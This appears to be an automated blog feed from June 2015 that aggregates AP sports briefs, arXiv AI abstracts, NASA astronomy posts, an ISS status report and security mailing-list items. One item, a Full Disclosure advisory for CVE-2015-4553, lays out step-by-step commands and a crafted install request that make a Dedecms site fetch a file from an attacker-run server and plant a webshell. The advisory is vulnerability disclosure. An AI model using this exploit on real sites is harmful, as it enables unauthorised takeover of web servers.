Have you ever seen the Pleiades star cluster? Even if you have, you probably have never seen it as dusty as this. Perhaps the most famous star cluster on the sky, the bright stars of the Pleiades can be seen without binoculars from even the depths of a light-polluted city. With a long exposure from a dark location, though, the dust cloud surrounding the Pleiades star cluster becomes very evident. The featured exposure took over 12 hours and covers a sky area several times the size of the full moon. Also known as the Seven Sisters and M45, the Pleiades lies about 400 light years away toward the constellation of the Bull (Taurus). A common legend with a modern twist is that one of the brighter stars faded since the cluster was named, leaving only six stars visible to the unaided eye. The actual number of Pleiades stars visible, however, may be more or less than seven, depending on the darkness of the surrounding sky and the clarity of the observer's eyesight.

via NASA http://ift.tt/1G2jTZJ

Wednesday, June 17, 2015

Neymar sent off as Colombia beats Brazil 1-0 in Copa America

SANTIAGO, Chile (AP) Taking advantage of a bad night by Neymar, Colombia defeated Brazil 1-0 in the Copa America on Wednesday, keeping its quarterfinals hopes alive in the South American tournament.

from FOX Sports Digital http://ift.tt/1JVOtKY
via IFTTT

Fulham assistant Miller is new Newcastle coach in A-League

NEWCASTLE, Australia (AP) Fulham assistant Scott Miller will take over as head coach of the Newcastle Jets next season, returning to Australia after nearly a decade in England.

from FOX Sports Digital http://ift.tt/1L19eEm
via IFTTT

Colombia beats Brazil 1-0 in Copa America

SANTIAGO, Chile (AP) Jeison Murillo scored a 36th-minute winner to give Colombia a 1-0 win over Brazil in the Copa America on Wednesday, keeping his team's quarterfinals hopes alive in the South American tournament.

from FOX Sports Digital http://ift.tt/1IPYDtD
via IFTTT

Orioles Highlight: Chris Parmelee homers for 3rd time in 2 games as Baltimore makes it 3 straight wins over Philadelphia (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

SNA-based reasoning for multiagent team composition. (arXiv:1506.05154v1 [cs.MA])

Social network analysis (SNA), a branch of complex systems, can be used in the construction of multiagent systems. This paper proposes a study of how social network analysis can assist in modeling multiagent systems, while addressing similarities and differences between the two theories. We built a prototype of multi-agent systems for resolution of tasks through the formation of teams of agents that are formed on the basis of the social network established between agents. Agents make use of performance indicators to assess when they should change their social network to maximize their participation in teams.



from cs.AI updates on arXiv.org http://ift.tt/1fiehEl
via IFTTT

SAT-based Analysis of Large Real-world Feature Models is Easy. (arXiv:1506.05198v1 [cs.SE])

Modern conflict-driven clause-learning (CDCL) Boolean SAT solvers provide efficient automatic analysis of real-world feature models (FM) of systems ranging from cars to operating systems. It is well-known that solver-based analysis of real-world FMs scales very well even though SAT instances obtained from such FMs are large, and the corresponding analysis problems are known to be NP-complete. To better understand why SAT solvers are so effective, we systematically studied many syntactic and semantic characteristics of a representative set of large real-world FMs. We discovered that a key reason why large real-world FMs are easy-to-analyze is that the vast majority of the variables in these models are unrestricted, i.e., the models are satisfiable for both true and false assignments to such variables under the current partial assignment. Given this discovery and our understanding of CDCL SAT solvers, we show that solvers can easily find satisfying assignments for such models without too many backtracks relative to the model size, explaining why solvers scale so well. Further analysis showed that the presence of unrestricted variables in these real-world models can be attributed to their high degree of variability. Additionally, we experimented with a series of well-known non-backtracking simplifications that are particularly effective in solving FMs. The remaining variables/clauses after simplifications, called the core, are so few that they are easily solved even with backtracking, further strengthening our conclusions.



from cs.AI updates on arXiv.org http://ift.tt/1Ljnmqx
via IFTTT

Why Bother With Syntax?. (arXiv:1506.05282v1 [cs.AI])

This short note discusses the role of syntax vs. semantics and the interplay between logic, philosophy, and language in computer science and game theory.



from cs.AI updates on arXiv.org http://ift.tt/1GQhEwn
via IFTTT

Early Predictions of Movie Success: the Who, What, and When of Profitability. (arXiv:1506.05382v1 [cs.AI])

This paper proposes a decision support system to aid movie investment decisions at the early stage of movie productions. The system predicts the success of a movie based on its profitability by leveraging historical data from various sources. Using social network analysis and text mining techniques, the system automatically extracts several groups of features, including "who" are on the cast, "what" a movie is about, "when" a movie will be released, as well as "hybrid" features that match "who" with "what", and "when" with "what". Our experiments with movies during an 11-year period showcase the system's decent performance in predicting movie success. Moreover, experiment results also suggest that different groups of features, including novel features we proposed, all contribute to the prediction.



from cs.AI updates on arXiv.org http://ift.tt/1fiehEh
via IFTTT

Hybrid Algorithm for Multi-Objective Optimization by Greedy Hypervolume Maximization. (arXiv:1506.05424v1 [cs.NE])

This paper introduces a high-performance hybrid algorithm, called Hybrid Hypervolume Maximization Algorithm (H2MA), for multi-objective optimization that alternates between exploring the decision space and exploiting the already obtained non-dominated solutions. The proposal is centered on maximizing the hypervolume indicator, thus converting the multi-objective problem into a single-objective one. The exploitation employs gradient-based methods, but considering a single candidate efficient solution at a time, to overcome limitations associated with population-based approaches and also to allow an easy control of the number of solutions provided. There is an interchange between two steps. The first step is a deterministic local exploration, endowed with an automatic procedure to detect stagnation. When stagnation is detected, the search is switched to a second step characterized by a stochastic global exploration using an evolutionary algorithm. Using five ZDT benchmarks with 30 variables, the performance of the new algorithm is compared to state-of-the-art algorithms for multi-objective optimization, more specifically NSGA-II, SPEA2, and SMS-EMOA. The solutions found by the H2MA guide to higher hypervolume and smaller distance to the true Pareto frontier with significantly fewer function evaluations, even when the gradient is estimated numerically. Furthermore, although only continuous decision spaces have been considered here, discrete decision spaces could also have been treated, replacing gradient-based search by hill-climbing. Finally, a thorough explanation is provided to support the expressive gain in performance that was achieved.



from cs.AI updates on arXiv.org http://ift.tt/1Ljnmqt
via IFTTT

Fair assignment of indivisible objects under ordinal preferences. (arXiv:1312.6546v4 [cs.GT] UPDATED)

We consider the discrete assignment problem in which agents express ordinal preferences over objects and these objects are allocated to the agents in a fair manner. We use the stochastic dominance relation between fractional or randomized allocations to systematically define varying notions of proportionality and envy-freeness for discrete assignments. The computational complexity of checking whether a fair assignment exists is studied for these fairness notions. We also characterize the conditions under which a fair assignment is guaranteed to exist. For a number of fairness concepts, polynomial-time algorithms are presented to check whether a fair assignment exists. Our algorithmic results also extend to the case of unequal entitlements of agents. Our NP-hardness result, which holds for several variants of envy-freeness, answers an open question posed by Bouveret, Endriss, and Lang (ECAI 2010). We also propose fairness concepts that always suggest a non-empty set of assignments with meaningful fairness properties. Among these concepts, optimal proportionality and optimal weak proportionality appear to be desirable fairness concepts.



from cs.AI updates on arXiv.org http://ift.tt/Jm0tYR
via IFTTT

Swiss champion Basel agrees to end coach Sousa's contract

BASEL, Switzerland (AP) Swiss champion Basel says it has agreed to terminate coach Paulo Sousa's contract after just one season.

from FOX Sports Digital http://ift.tt/1HUwuTt
via IFTTT

[FD] [CVE-2015-4553]Dedecms variable coverage leads to getshell

[CVE-2015-4553]Dedecms variable coverage leads to getshell

#############################################################################
#
# DBAPPSECURITY LIMITED http://ift.tt/1QJxXMS
#
#############################################################################
#
# CVE ID: CVE-2015-4553
# Subject: Dedecms variable coverage leads to getshell
# Author: zise
# Date: 06.17.2015
#############################################################################

Introduction:
========
dedecms Open source cms
Extensive application

Influence version
Newest dedecms 5.7-sp1 and all old version

Remote getshell

Details:
=======
After the default installation of dedecms
Installation directory
/install/index.php
or
/install/index.php.bak

/install/index.php //run iis apache exploit
/install/index.php.bak //run apache exploit

Step 1
#############################################################################
Clear file contents config_update.php

====File content====
[×] 远程获取失败
###

###After execution file 0 byte ~ho~year~####
2015/06/17 14:55 0 config_update.php
1 file 0 byte

Step 2
#############################################################################
Create local HTTP services

zise:tmp zise$ ifconfig en0
en0: flags=8863 mtu 1500
inet 119.253.3.18 netmask 0xffffff00 broadcast
zise:tmp zise$ mkdir "dedecms"
zise:tmp zise$ cd dedecms/
zise:dedecms zise$ echo "" > demodata.a.txt
zise:dedecms zise$ cd ../
zise:tmp zise$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -

####
http://ift.tt/1Bo74MC
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://ift.tt/1d20hwy
####

HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 07:11:18 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: Accept-Encoding,User-Agent
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[√] 存在(您可以选择安装进行体验)

Attack complete
you webshell http://ift.tt/1Bo76UP

======================
zise ^_^
zise.shi@dbappsecurity.com.cn
Security researcher

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Announcing NorthSec 2015 - Montreal, May 21-24

Hello everyone, we're very pleased to announce that NorthSec 2015 Conference Recordings are now available for free on YouTube, including talks about Privacy, Malware, Reverse Engineering, Cryptography, Bitcoins and many more: https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh Speakers' slides are also being made available at the following address: http://ift.tt/1d20hge We had an awesome 2015 edition and we're already working hard to make it even better in 2016! See you in May next year!

Source: Gmail -> IFTTT-> Blogger

Vidal appears in court; gets 4 month driving ban after DUI

SANTIAGO, Chile (AP) Chile's star midfielder Arturo Vidal was banned from driving for four months by a Chilean judge on Wednesday after he crashed his Ferrari while driving under the influence of alcohol.

from FOX Sports Digital http://ift.tt/1G4blSe
via IFTTT

ECHR Finds Website Liable for Anonymous User Comments

ECHR Finds Website Liable for Anonymous User Comments ... can be held responsible for anonymous comments on its site, Ars Technica reports.

from Google Alert - anonymous http://ift.tt/1N3amGB
via IFTTT

Leicester fires 3 players over sex tape in Thailand

LEICESTER, England (AP) English Premier League club Leicester has fired three players after a video emerged showing them in an apparent orgy with Thai sex workers, one of whom was racially abused.

from FOX Sports Digital http://ift.tt/1BnKpQH
via IFTTT

New Zealand sets England victory target of 350 in 4th ODI

NOTTINGHAM, England (AP) A combative 90 from Kane Williamson and half centuries from Grant Elliott and Martin Guptill helped New Zealand reach 349-7 in the fourth one-day international on Wednesday, setting England a national-record run chase to avoid a series defeat.

from FOX Sports Digital http://ift.tt/1BnKpQD
via IFTTT

Arsenal's Jack Wilshere fined over parade outburst

LONDON (AP) The English Football Association has fined Arsenal midfielder Jack Wilshere 40,000 pounds ($62,800) for a foul-mouthed outburst toward rival club Tottenham during his team's FA Cup victory celebrations.

from FOX Sports Digital http://ift.tt/1fht2XN
via IFTTT

FIFA prosecutor ready to act as World Cup bids probe widens

ZURICH (AP) FIFA ethics prosecutor Cornel Borbely says he is prepared to open more cases against officials as part of the investigations into the bidding for the 2018 and 2022 World Cups.

from FOX Sports Digital http://ift.tt/1SolVem
via IFTTT

Anonymous on Twitter: "Don't abuse government power, don't censor the web, and don't arrest ...

... Favorites 32; #TupacIsAlive Spirit Ghost Damien Devlin jnr Debbie E Don't Mind Me. Anonyamoose Esvin Barrios Anonymous News Carre d'As.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/AnonymousGlobo/status/610889147537039360&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNEFHhoJjK_jbwDfwfVvCKb9w5PDBQ
via IFTTT

Moenchengladbach signs striker Drmic from Leverkusen

MOENCHENGLADBACH, Germany (AP) Borussia Moenchengladbach says it has signed Switzerland striker Josip Drmic from Bundesliga rival Bayer Leverkusen.

from FOX Sports Digital http://ift.tt/1LfvnzN
via IFTTT

ISS Daily Summary Report – 06/16/15

Binary Colloidal Alloy Test-Low Gravity Phase Kinetics Platform (BCAT-KP): Kelly reviewed the experiment prior to charging the D2Xs camera batteries, changing out batteries and setting the intervalometer settings. The BCAT-KP experiment aims to help materials scientists develop new consumer products with unique properties and longer shelf lives. Colloids are mixtures of small particles distributed throughout a liquid, which include milk, detergents and liquid crystals. Gravity affects how the particles clump together and sink, making the International Space Station an ideal platform to study their fundamental behaviors.

Advanced Colloids Experiment Heating-1 (ACE-H1) Sample Changeout: Kelly cleaned up oil on the first ACE Heated Sample inside the Light Microscopy Module (LMM) Auxiliary Fluids Container (AFC) followed by removal and inspection of the sample. He then installed the second sample and dispensed oil. This is the second of two planned ACE-H1 samples, although a third contingency sample is available. The ACE-H1 experiment examines densely packed microscopic spheres, or colloidal mixtures, to study their transition from ordered crystals into disordered glass. The particles are fluorescent and change size in different temperatures so scientists are able to see how they move and change forms as they are heated and cooled. Studying particle interactions without the influence of gravity improves the ability of scientists to understand how increasing disorder in a crystal material affects its freezing, melting, aging and structural integrity.

On Board Training (OBT) Robotics On-Board Trainer (RoBOT): Kelly and Padalka continued preparing for SpX-7 arrival, completing another OBT session. Today’s session focused on assessing vehicle motion prior to and after free drift, assessing Space Station Remote Manipulator System (SSRMS) closing rate and monitoring Latching End Effector (LEE) telemetry.

Today’s Planned Activities
All activities were completed unless otherwise noted.
PAO hardware setup Crew preparation for PAO in JPM TV conference with Trud newspaper reporter in JPM PROBOY. Activity with RSЕ1 Station laptop. PROBOY. Activity with Penetration Simulator WRS Water Sample Analysis BCAT – Experiment Procedure Review ARED Flywheel Cylinder Evacuation PROBOY. Copy and Downlink Data Replacement of urine receptacle (МП) and filter-insert (Ф-В) in АСУ АСУ Activation after Replacement DAN. Experiment Execution Support DAN. Experiment Ops. TOCA Data Recording MPEV – Providing Access WRS – Recycle Tank Fill BCAT – Start Battery Charge OBT – Dragon Rendezvous and Berthing Procedures Review Urine Transfer from EDV-U to ТКГ 425 Rodnik Water Tank1 and Flushing cnctr KV1 Connector OBT – Dragon Rendezvous and Berthing Procedures Review FIR Rack Doors Open IMS Delta File Prep ACE-H1. Sample Changeout Video Footage of Greetings FIR. Rack Doors Closure WRS – Recycle Tank Fill СОЖ Maintenance BCAT – Battery Replacement and Photo Downlink PCS Battery Swap [Deferred]

Completed Task List Items: None

Ground Activities
All activities were completed unless otherwise noted.
RoBOT training support
ACE-H1 sample changeout

Three-Day Look Ahead:
Wednesday, 06/17: JEMAL pressurization, MPEP dosimeter removal, Rodent Research (RR) MSG stow, Ocular Health
Thursday, 06/18: RR Microgravity Science Glovebox LSAH cleanup, Ocular Health
Friday, 06/19: Ocular Health, CUCU/CCP checkout, OBT RoBOT training

QUICK ISS Status – Environmental Control Group:
Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Shutdown
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Standby
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/1Lhqwe8
via IFTTT

PFF President suspended over financial embezzlement, report

ISLAMABAD (AP) The Pakistan Football Federation has suspended its president Faisal Saleh Hayat for alleged incompetence and financial embezzlement, local media reported.

from FOX Sports Digital http://ift.tt/1d0TenW
via IFTTT

Sounders finish with 7 men in US Open Cup

TUKWILA, Washington (AP) Seattle Sounders finished their U.S. Open Cup derby against Portland with just seven players after three were sent off and one was injured after all substitutes had been used.

from FOX Sports Digital http://ift.tt/1KZ5jIc
via IFTTT

Swiss bank named in FIFA indictment opens investigation

ZURICH (AP) Swiss private bank Julius Baer says it is investigating its involvement in a FIFA corruption case and is cooperating with authorities.

from FOX Sports Digital http://ift.tt/1GOgEsK
via IFTTT

Asian confederation general secretary quits amid probe

KUALA LUMPUR, Malaysia (AP) The Asian Football Confederation says general secretary Alex Soosay has tendered his resignation with immediate effect.

from FOX Sports Digital http://ift.tt/1FmcIKj
via IFTTT

Brazil to meet Serbia in Under-20 World Cup final

WELLINGTON, New Zealand (AP) Brazil beat Senegal 5-0 to join Serbia in the final of the Under-20 World Cup and to bury the nascent suspicion football's great expressionists had embarked on a new, more sober course on Wednesday.

from FOX Sports Digital http://ift.tt/1R8j1rF
via IFTTT

Capello on the brink with Russian football in crisis

MOSCOW (AP) Even if FIFA scandals were not placing Russia's right to host the 2018 World Cup under scrutiny, Russian football would still be in crisis.

from FOX Sports Digital http://ift.tt/1Ttr1aH
via IFTTT

Serbia advances to under-20 World Cup final vs Brazil

AUCKLAND, New Zealand (AP) Serbia is through to Saturday's Under-20 World Cup final against Brazil after beating 10-man Mali 2-1 after extra time at North Harbour Stadium on Wednesday.

from FOX Sports Digital http://ift.tt/1GetQCw
via IFTTT

Pavel Kaderabek moves to Hoffenheim from Sparta Prague

PRAGUE (AP) Czech Republic defender Pavel Kaderabek has moved from Sparta Prague to Hoffenheim in the Bundesliga.

from FOX Sports Digital http://ift.tt/1TtprFL
via IFTTT

Swiss AG: 53 possible money-laundering cases in FIFA probe

BERN, Switzerland (AP) Switzerland's attorney-general says banks have noted 53 possible money-laundering incidents in his investigation of the 2018 and 2022 World Cup bidding contests.

from FOX Sports Digital http://ift.tt/1JXlKE3
via IFTTT

Chelsea opens EPL defense against Swansea, Man U hosts Spurs

LONDON (AP) Chelsea will begin its English Premier League defense against Swansea, while Manchester United hosts Tottenham on the opening weekend.

from FOX Sports Digital http://ift.tt/1Sne2WJ
via IFTTT

Brazil builds confidence with U20 World Cup semifinal win

CHRISTCHURCH, New Zealand (AP) A dominant performance full of goals was exactly what Brazil's under-20 football side needed ahead of Saturday's final.

from FOX Sports Digital http://ift.tt/1JXhILQ
via IFTTT

Brazil beats Senegal 5-0 to reach U20 WCup final

CHRISTCHURCH, New Zealand (AP) Brazil swept into the final of the Under-20 World Cup by routing Senegal 5-0 and awaits the winner of Wednesday's second semifinal between Serbia and Mali.

from FOX Sports Digital http://ift.tt/1Lgdo9l
via IFTTT

Asian powers unconvincing in World Cup qualifying

SEOUL, South Korea (AP) The four power teams of Asian football avoided defeat in their opening World Cup qualifiers, yet none put in performances that will dispel the doubts about the strength of the region's teams following their combined winless record at the 2014 World Cup.

from FOX Sports Digital http://ift.tt/1JSS9Ny
via IFTTT

APOD is 20 Years Old Today


Welcome to the vicennial year of the Astronomy Picture of the Day! Perhaps a source of web consistency for some, APOD is still here. As during each of the 20 years of selecting images, writing text, and editing the APOD web pages, the occasionally industrious Robert Nemiroff (left) and frequently persistent Jerry Bonnell (right) are pictured above plotting to highlight yet another unsuspecting image of our cosmos. Although the featured image may appear similar to the whimsical Vermeer composite that ran on APOD's fifth anniversary, a perceptive eye might catch that it has been digitally re-pixelated using many of the over 5,000 APOD images that have appeared over APOD's tenure. (Can you find any notable APOD images?) Once again, we at APOD would like to offer a sincere thank you to our readership for continued interest, support, and many gracious communications. If you consider yourself a fan of APOD, you might want to consider joining the Friends of APOD.

via NASA http://ift.tt/1Ca37pO